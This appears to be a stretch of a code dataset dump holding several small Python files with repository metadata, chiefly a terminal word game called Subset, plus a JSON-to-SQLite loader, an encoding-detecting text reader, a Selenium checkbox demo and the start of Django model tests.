"line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 238, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 244, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 244, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 245, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 245, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 247, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 247, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 248, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 249, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 274, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 274, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 275, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 275, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 276, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 278, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 282, "usage_type": "call"}, {"api_name": "scipy.integrate.trapz", "line_number": 283, "usage_type": "call"}, {"api_name": "scipy.integrate", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 286, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 286, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 287, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 287, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 289, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}]} +{"seq_id": "8646643052", "text": "#!/usr/bin/env python3\n\nimport random\nimport re\nimport math\nimport os\nimport time\nimport sys\nimport textwrap\nimport shutil\nfrom pathlib import Path\n\nimport colorama\n\n\n# Style globals\nRED = \"\\033[31m\"\nYELLOW = \"\\033[33m\"\nGREEN = \"\\033[32m\"\nCYAN = \"\\033[36m\"\nBOLD = \"\\033[1m\"\nDEFAULT = \"\\033[0m\"\n\n# Display globals\nWIDTH = shutil.get_terminal_size().columns # Falls back to 80\nMID_WIDTH = 35\n\n# Filesystem globals\nROOT = os.path.dirname(os.path.abspath(__file__)) \nLOCAL = os.path.join(str(Path.home()), \".subset\")\n\n# For the specific game\nSEED = round(time.time())\n\n\ndef main():\n global WIDTH\n global SEED\n\n # On Windows, this allows use of ANSI escape sequences\n colorama.init()\n\n # Ensure local directory exists\n if not os.path.exists(LOCAL):\n os.makedirs(LOCAL)\n\n # Load dictionary, this should remove proper nouns and non-alpha words\n with open(os.path.join(ROOT, \"dictionary.txt\"), encoding=\"ISO-8859-1\") as f:\n dictionary = [line.strip() for line in f.readlines() if \n set(\"-_'.?!():;#\\\"1234567890\").isdisjoint(set(line)) and\n not line[0].isupper()]\n\n\n # Check for a savefile and load it. This works by setting the random seed\n # and loading all found words. Setup welcome messages\n try:\n # Savefile structure is:\n # #seed\n # {the seed}\n # #found\n # {line}\n # {dilineated}\n # {words}\n #\n # This format is cool because you can just iterate over it using a state\n # machine where any state can transition to any other state\n\n with open(os.path.join(LOCAL, \"savefile.txt\")) as f:\n found = []\n state = \"\"\n for line in f.readlines():\n if line[0] == \"#\":\n state = line[1:].strip()\n elif state == \"seed\":\n SEED = int(line.strip())\n elif state == \"found\":\n if line.strip() != \"\":\n found.append(line.strip())\n print_banner()\n message = f\"{CYAN}Found save file{DEFAULT}\"\n except FileNotFoundError:\n # SEED is already set\n found = [] \n message = f\"{BOLD}Welcome to Subset!{DEFAULT} {CYAN}Started a new game{DEFAULT}\"\n\n\n # Seed it with either the default unixtime, or the seed loaded from the file\n random.seed(SEED)\n\n # In case it ever comes up, only use operations when restoring state from\n # SEED that have a defined and guaranteed order. Earlier I used letters =\n # list(set(pangram)), then used random.choice(letters). This broke because set\n # does not have a consistent order when converting to a list\n\n # First make a list of any possible pangram, then pick one\n possible_pangrams = [word for word in dictionary if len(set(word)) == 7]\n pangram = random.choice(possible_pangrams)\n\n # Pick a special letter, and make a persistent ordered list of the others\n letters = list(set(pangram))\n letters.sort()\n special_letter = random.choice(letters)\n ring_letters = [letter.upper() for letter in letters if not letter is\n special_letter]\n random.shuffle(ring_letters)\n\n # Make a list of all valid words. The dictionary never needs to be touched\n # again after this\n valid_words = [word for word in dictionary if\n set(word).issubset(set(letters)) and \n len(word) >= 4 and\n special_letter in word]\n\n # Quickly find other pangrams that share letters with the starting one\n # (there usually are a few)\n pangrams = [word for word in valid_words if len(set(word)) == 7]\n\n\n # Compute both total possible score and score so far (nonzero when loading\n # from a save)\n total_score = sum([score_word(word) for word in valid_words])\n score = sum([score_word(word) for word in found])\n\n while True:\n # Refresh size every loop\n WIDTH = shutil.get_terminal_size().columns\n clear()\n print_banner()\n\n # Render game stats to the right of the logo\n score_color = color_score(score, total_score)\n # Save the cursor, not necessary, but nice because we're going to jump\n # back into the logo lines and print score, words, and total pangrams\n print(\"\\033[s\")\n print(f\"\\033[3;{WIDTH-16}H\", end=\"\")\n print(align(f\"Score: {score_color}{score}{DEFAULT}/{GREEN}{total_score}{DEFAULT}\", 16, \"r\")) \n print(f\"\\033[4;{WIDTH-16}H\", end=\"\")\n print(align(f\"Words: {score_color}{len(found)}{DEFAULT}/{GREEN}{len(valid_words)}{DEFAULT}\", 16, \"r\"))\n print(f\"\\033[5;{WIDTH-16}H\", end=\"\")\n print(align(f\"{YELLOW}{pluralize(len(pangrams), 'Pangram')}{DEFAULT}\", 16, \"r\"))\n # Restore the cursor (to one line below the banner separator (===))\n print(\"\\033[u\")\n\n # Print a hexagon of letters, with the common letter in the centre\n print(align(f\" {ring_letters[0]} {ring_letters[1]} \", WIDTH, \"c\"))\n print(align(f\"{ring_letters[2]} {YELLOW}{special_letter.upper()}{DEFAULT} {ring_letters[3]}\", WIDTH, \"c\"))\n print(align(f\" {ring_letters[4]} {ring_letters[5]} \", WIDTH, \"c\"))\n\n # Print out the status message (often the result of last command or\n # guess). Clear it immediately (so just pressing enter can banish it)\n print(message)\n message = \"\"\n\n # Collect input in yellow\n print(f\"Type word or {BOLD}h{DEFAULT} for help\")\n guess = input(f\"> {YELLOW}\").strip().lower()\n print(DEFAULT, end=\"\")\n\n # All options should clear the screen (though all should redraw the\n # banner too\n\n WIDTH = shutil.get_terminal_size().columns\n clear()\n\n # Ignore empty input\n if guess == \"\":\n continue\n\n # About game text, rules/sources\n elif guess == \"a\":\n print_about()\n pause()\n\n # Save and exit. This is different from quit because quit shows you your\n # score and deletes your save file\n elif guess == \"e\":\n print_saveandexit(found)\n\n # Help text\n elif guess == \"h\":\n print_help()\n pause()\n\n # List words out\n elif guess == \"l\":\n print_foundlist(found, valid_words, score, total_score) \n pause()\n\n # Randomize the non-common letter positions\n elif guess == \"s\":\n random.shuffle(ring_letters)\n message = f\"{CYAN}Shuffled{DEFAULT}\"\n\n # Abandon game. This isn't a function because it does a lot of stuff\n elif guess == \"q\":\n print_quit(found, valid_words, score, total_score) \n\n # Tell user when they already used a word\n elif guess in found:\n message = f\"{YELLOW}Already played {guess}{DEFAULT}\"\n\n # Anything else must be an untried guess\n else:\n if guess in valid_words:\n # Duplicating the scoring code because we're checking for\n # pangrams too\n if len(guess) == 4:\n d_score = 1\n else:\n d_score = len(guess)\n if len(set(guess)) == 7:\n d_score = d_score + 14\n message = f\"{GREEN}Pangram found! +{pluralize(d_score, 'point')}{DEFAULT}\"\n else:\n message = f\"{GREEN}Correct! +{pluralize(d_score, 'point')}{DEFAULT}\"\n score = score + d_score\n found.append(guess)\n\n # An invalid word was inputted. Find out why\n else:\n # May use letters, but missing the common one\n if not special_letter in guess:\n message = f\"{RED}'{guess.title()}' does not contain {YELLOW}{special_letter.upper()}{DEFAULT}\"\n # If it is a dictionary word, it must use bad letters\n elif guess in dictionary:\n message = f\"{RED}'{guess.title()}' uses other letters{DEFAULT}\"\n # Anything else means the dictionary doesn't have it\n else:\n message = f\"{RED}'{guess.title()}' is not in dictionary{DEFAULT}\"\n print() \n\ndef print_banner():\n if WIDTH > 70:\n alignment = \"c\"\n elif WIDTH > 50:\n alignment = \"l\"\n else:\n print(f\"\\n\\n\\n\\n{YELLOW}Subset{DEFAULT}\\n\"+\"=\"*WIDTH+\"\\n\")\n return\n\n print(YELLOW, end=\"\")\n print(align(\" _____ __ __ \", WIDTH, alignment))\n print(align(\" / ___/__ __/ /_ ________ / /_\", WIDTH, alignment))\n print(align(\" \\\\__ \\\\/ / / / __ \\\\/ ___/ _ \\\\/ __/\", WIDTH, alignment))\n print(align(\" ___/ / /_/ / /_/ (__ ) __/ /_ \", WIDTH, alignment))\n print(align(\"/____/\\\\__,_/_.___/____/\\\\___/\\\\__/ \", WIDTH, alignment))\n print(DEFAULT, end=\"\")\n print()\n print(\"=\"*WIDTH)\n print()\n\n\ndef print_foundlist(found, valid_words, score, total_score):\n score_color = color_score(score, total_score)\n print_banner()\n print(f\"Found {score_color}{len(found)}{DEFAULT}/{GREEN}{len(valid_words)}{DEFAULT} words:\")\n longest = 0\n for word in found:\n if len(word) > longest:\n longest = len(word)\n\n col_width = longest + 1\n columns = math.floor(WIDTH/col_width)\n for i in range(0, len(found)):\n ending = \"\"\n if (i+1) % columns == 0:\n ending = \"\\n\"\n if len(set(remove_ansi(found[i]))) == 7:\n print(align(f\" {YELLOW}*{DEFAULT}{found[i]}\", col_width, \"l\"), end=ending)\n else:\n print(align(f\" {found[i]}\", col_width, \"l\"), end=ending)\n print()\n\ndef print_help():\n print_banner()\n print(align(\"Commands\", WIDTH, \"c\"))\n print(align(\"-\"*MID_WIDTH, WIDTH, \"c\"))\n print(align(align(\"a About this game\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"e Save and exit\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"h Help (this text)\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"l List found words\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"q Quit and show words\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"s Shuffle letters\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print()\n\ndef print_about():\n print_banner()\n print(align(\"About Subset\", WIDTH, \"c\"))\n print( align(\"----------------------------------\", WIDTH, \"c\"))\n print(align(align(f\"{YELLOW}Subset{DEFAULT} is a word-finding game.\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"Every game, you are presented\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"with seven letters, the goal is\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"to make as many words as you can\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"using those letters. You may use\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"the same letter more than once\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"in a word. You MUST use the center\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"letter in every word. Longer words\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"are worth more points. Words that\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"use all seven letters are called\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"'pangrams' and are worth extra\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"points as well.\", 35, \"l\"), WIDTH, \"c\"))\n print()\n print(align(f\"The dictionary is taken from the excellent SCOWL project.\", WIDTH, \"c\"))\n print(align(f\"See {ROOT}/DICTIONARY_LICENSE.txt for license information.\", WIDTH, \"c\"))\n print()\n print(align(f\"{YELLOW}Subset{DEFAULT} is open source and available at:\", WIDTH, \"c\"))\n print(align(f\"{CYAN}https://github.com/rightbrace/subset-game.git{DEFAULT}\", WIDTH, \"c\"))\n print()\n\n\ndef print_quit(found, valid_words, score, total_score):\n print_banner()\n\n # Double check with the player\n choice = input(align(\"Really end this game and see results? (y/n) \", WIDTH, \"c\", end=False))\n if choice.lower() != \"y\":\n return\n\n clear()\n print_banner()\n\n # Resummarize results in middle of page\n score_color = color_score(score, total_score)\n print(align(f\"Final score: {score_color}{score}{DEFAULT}/{GREEN}{total_score}{DEFAULT}\", WIDTH, \"c\"))\n print(align(f\"Found {score_color}{len(found)}{DEFAULT}/{GREEN}{len(valid_words)}{DEFAULT} words\", WIDTH, \"c\"))\n\n # Print the words in column, wound words in green and asterecies next to pangrams\n print_words = input(align(\"Print words? (y/n) \", WIDTH, \"c\", end=False))\n if print_words.lower() == \"y\":\n # Colour words that were found and find the maximum sized word\n to_print = []\n longest = 0\n for word in valid_words:\n if word in found:\n out = f\"{GREEN}{word}{DEFAULT}\"\n else:\n out = word\n to_print.append(out)\n if len(word) > longest:\n longest = len(word)\n \n # Work out how many columns can fit\n col_width = longest + 2\n columns = math.floor(WIDTH/col_width)\n\n # Spacer\n print()\n print(\"=\"*WIDTH)\n\n # Print words from list (they've been colored, but not starred), placing\n # newlines when appropriate\n for i in range(0, len(to_print)):\n ending = \"\"\n if (i+1) % columns == 0:\n ending = \"\\n\"\n if len(set(remove_ansi(to_print[i]))) == 7:\n print(align(f\" {YELLOW}*{DEFAULT}{to_print[i]}\", col_width, \"l\"), end=ending)\n else:\n print(align(f\" {to_print[i]}\", col_width, \"l\"), end=ending)\n\n print()\n print(\"=\"*WIDTH)\n print(align(f\"Pangrams are marked with {YELLOW}*{DEFAULT}\", WIDTH, \"r\"))\n print()\n\n # Delete savefile\n try:\n os.remove(os.path.join(LOCAL, \"savefile.txt\"))\n except FileNotFoundError:\n pass\n\n # Give user a bit of feedback before exiting\n pause()\n sys.exit()\n\n\ndef print_saveandexit(found):\n print_banner()\n really = input(align(\"Really save and exit? (y/n) \", WIDTH, \"c\", end=False))\n\n # Anything other than a y should return the user to safety\n if really[0].lower() != \"y\":\n return\n\n save_game(found)\n clear()\n print_banner()\n print(align(\"Game saved!\", WIDTH, \"c\"))\n print()\n pause()\n sys.exit()\n\n# Some utilities:\ndef clear():\n print(\"\\033c\", end=\"\")\n\ndef remove_ansi(string):\n return re.sub(\"\\033\\[\\d+m\", \"\", string)\n\ndef align(string, width, just, end=True):\n strlen = len(remove_ansi(string))\n if just == \"l\":\n if end:\n return string + \" \"*(width-strlen)\n else:\n return string\n elif just == \"r\":\n return \" \"*(width-strlen) + string\n elif just == \"c\":\n if end:\n return \" \"*math.ceil((width-strlen)/2) + string + \" \"*math.floor((width-strlen)/2)\n else:\n return \" \"*math.ceil((width-strlen)/2) + string\n\ndef pluralize(count, string, plural=\"\"):\n if count == 1:\n return f\"1 {string}\"\n else:\n if plural ==\"\":\n return f\"{count} {string}s\"\n else:\n return f\"{count} {plural}\"\n\ndef color_score(score, total_score):\n ratio = score / total_score\n if ratio < 0.33:\n score_color = RED\n elif ratio < 0.66:\n score_color = YELLOW\n else:\n score_color = GREEN\n return score_color\n\ndef score_word(word):\n score = 0\n if len(word) == 4:\n score = score + 1\n else:\n score = score + len(word)\n if len(set(word)) == 7:\n score = score + 14\n return score \n\ndef pause():\n input(align(align(\"[Press Enter]\", MID_WIDTH, \"l\", end=False), WIDTH, \"c\", end=False))\n\ndef save_game(found):\n with open(os.path.join(LOCAL, \"savefile.txt\"), \"w\") as f:\n f.write(\"#seed\\n\")\n f.write(str(SEED) + \"\\n\")\n f.write(\"#found\\n\")\n for word in found:\n f.write(word + \"\\n\")\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "rightbrace/subset-game", "sub_path": "subset/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 15946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "shutil.get_terminal_size", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pathlib.Path.home", "line_number": 30, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 30, "usage_type": "name"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "colorama.init", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 88, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 97, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 102, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 105, "usage_type": "call"}, {"api_name": "shutil.get_terminal_size", "line_number": 126, "usage_type": "call"}, {"api_name": "shutil.get_terminal_size", "line_number": 162, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 191, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 263, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 344, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path", "line_number": 368, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 374, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 391, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 398, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 411, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 411, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 413, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 448, "usage_type": "call"}, {"api_name": "os.path", "line_number": 448, "usage_type": "attribute"}]} +{"seq_id": "40882750321", "text": "import os, json\nimport pandas as pd\nfrom datetime import datetime\nimport sqlite3 \npath_to_json = '../project_NLP/bin/JSON_DATAS/'\njson_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\nconn = sqlite3.connect('11/db.sqlite3')\nc = conn.cursor()\ntry:\n for index,js in enumerate(json_files):\n with open(os.path.join(path_to_json,js)) as json_file:\n json_text = json.load(json_file)\n print(\"loading------------\")\n dgame = json_text[0][\"Game\"]\n c.execute(\"INSERT INTO ttes(game) VALUES (?);\",(dgame,))\n conn.commit()\n print(\"success\") \n\t\nexcept:\n print(\"No new data\")\n", "repo_name": "AlexTsai1618/project_NLP", "sub_path": "Music_NEW/game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 645, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 6, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "2410147136", "text": "from chardet import detect\nimport codecs\n\n\nclass TextExtractor:\n @classmethod\n def getContent(cls, file_name):\n\n encoding = \"\"\n\n with open(file_name, \"rb\") as f:\n rawdata = f.read()\n encoding = detect(rawdata)[\"encoding\"]\n\n with codecs.open(\n file_name, \"rb\", encoding=encoding, errors=\"ignore\"\n ) as file_content:\n content = cls.readContent(file_content)\n\n return content\n\n @classmethod\n def readContent(cls, file_content):\n return file_content.read()\n", "repo_name": "BobWatson/concept_miner_elastic", "sub_path": "app/ingestor/TextExtractor.py", "file_name": "TextExtractor.py", "file_ext": "py", "file_size_in_byte": 551, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "chardet.detect", "line_number": 13, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "2389224410", "text": "# Coding=utf-8\nfrom selenium import webdriver\nimport os\nimport time\n\ndriver = webdriver.Firefox()\nfile_path = 'file:///' + os.path.abspath('checkbox.html')\ndriver.get(file_path)\n\n# 选择页面上所有的 tag name 为 input 的元素\n# inputs = driver.find_elements_by_tag_name('input')\n#\n# # 然后从中过滤出 tpye 为 checkbox 的元素,单击勾选\n# for input in inputs:\n# if input.get_attribute('type') == 'checkbox':\n# input.click()\n\n# 选择所有的type为checkbook的元素并单击勾选\ncheckboxes=driver.find_elements_by_css_selector('input[type=checkbox]')\nfor checkbox in checkboxes:\n checkbox.click()\n\n# 打印当前页面上type为checkbook的个数\nprint(len(driver.find_elements_by_css_selector('input[type=checkbox]')))\n\n# 把页面最后一个checkbox的勾去掉\ndriver.find_elements_by_css_selector('input[type=checkbox]').pop().click()\ntime.sleep(3)\n\ndriver.quit()\n", "repo_name": "gting/AutoTest", "sub_path": "Test03/Test03.py", "file_name": "Test03.py", "file_ext": "py", "file_size_in_byte": 910, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 6, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 6, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "24114691990", "text": "from django.test import TestCase\nfrom scansion.models import User, Word, StressPattern, Poet, Poem, Algorithm, HumanScansion, MachineScansion\n\nclass TestUser(TestCase):\n @classmethod\n def setUpTestData(cls):\n User.objects.create(username=\"someone\")\n User.objects.create(username=\"someoneelse\", score=10)\n\n def test_user_not_promoted(self):\n u = User.objects.filter(username=\"someone\")\n self.assertTrue(u.exists())\n self.assertEqual(u[0].score, 0)\n self.assertFalse(u[0].is_promoted())\n self.assertEqual(u[0].__str__(), \"someone, Promoted: False\")\n\n def test_user_promoted(self):\n u = User.objects.filter(username=\"someoneelse\")\n self.assertTrue(u.exists())\n self.assertEqual(u[0].score, 10)\n self.assertTrue(u[0].is_promoted())\n self.assertEqual(u[0].__str__(), \"someoneelse, Promoted: True\")\n \nclass TestWord(TestCase):\n @classmethod\n def setUpTestData(cls):\n Word.objects.create(word=\"squirrel\")\n Word.objects.create(word=\"rabbit\", popularity=1, syllables=2, part_of_speech=\"n\")\n\n def test_word_defaults(self):\n w = Word.objects.filter(word=\"squirrel\")\n self.assertTrue(w.exists())\n self.assertEqual(w[0].popularity, 0)\n self.assertIsNone(w[0].syllables)\n self.assertEqual(w[0].part_of_speech, \"\")\n self.assertEqual(w[0].pronunciation_line, \"\")\n self.assertEqual(w[0].__str__(), \"squirrel\")\n\n def test_word_values(self):\n w = Word.objects.filter(word=\"rabbit\")\n self.assertTrue(w.exists())\n self.assertEqual(w[0].popularity, 1)\n self.assertEqual(w[0].syllables, 2)\n self.assertEqual(w[0].part_of_speech, \"n\")\n self.assertEqual(w[0].__str__(), \"rabbit\")\n\nclass TestStressPattern(TestCase):\n @classmethod\n def setUpTestData(cls):\n Word.objects.create(id=1, word=\"squirrel\", popularity=2)\n StressPattern.objects.create(word=Word.objects.get(word=\"squirrel\"), stresses=\"squirrel\")\n StressPattern.objects.create(word=Word.objects.get(word=\"squirrel\"), stresses=\"/u\")\n \n def test_stresspattern_valid(self):\n s = StressPattern.objects.filter(word=Word.objects.get(word=\"squirrel\"))\n self.assertEqual(s.count(), 2)\n self.assertEqual(s[1].word.word, \"squirrel\")\n self.assertEqual(s[1].popularity, 1)\n self.assertEqual(s[1].get_syllable_count(), 2)\n self.assertTrue(s[1].is_valid())\n self.assertEqual(s[1].__str__(), 